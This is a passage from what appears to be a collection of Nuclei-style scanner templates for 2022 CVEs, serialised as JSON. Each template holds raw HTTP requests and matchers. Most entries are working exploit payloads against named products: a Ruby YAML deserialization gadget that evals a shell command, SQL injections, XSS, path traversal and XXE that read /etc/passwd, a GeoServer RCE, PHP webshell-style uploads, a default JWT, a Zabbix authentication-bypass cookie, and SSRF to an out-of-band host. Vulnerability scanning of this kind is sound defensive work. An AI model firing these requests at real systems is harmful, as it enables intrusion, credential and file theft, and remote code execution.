application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0651","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["<html","<body","<script"],"negative":true}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"or","matchers":[{"type":"dsl","name":"time-based","dsl":["duration_2>=6","status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")","contains(body_3, \"content\") && contains(body_3, \"{{Hostname}}\")","!contains(body_4, \"content\") && !contains(body_4, \"{{Hostname}}\")","len(body_3) > 200 && len(body_4) <= 22"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","part":"body_1","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-25148","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","<IMG SRC=X ONERROR="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3869","info":{"name":"Froxlor < 0.10.38.2. - HTML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The message to \"\"><h2>TEST</h2>\" failed"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39048","info":{"name":"ServiceNow - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /navpage.do HTTP/1.1\nHost: {{Hostname}}\n","POST /login.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n","GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"","assessment_list.do"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, 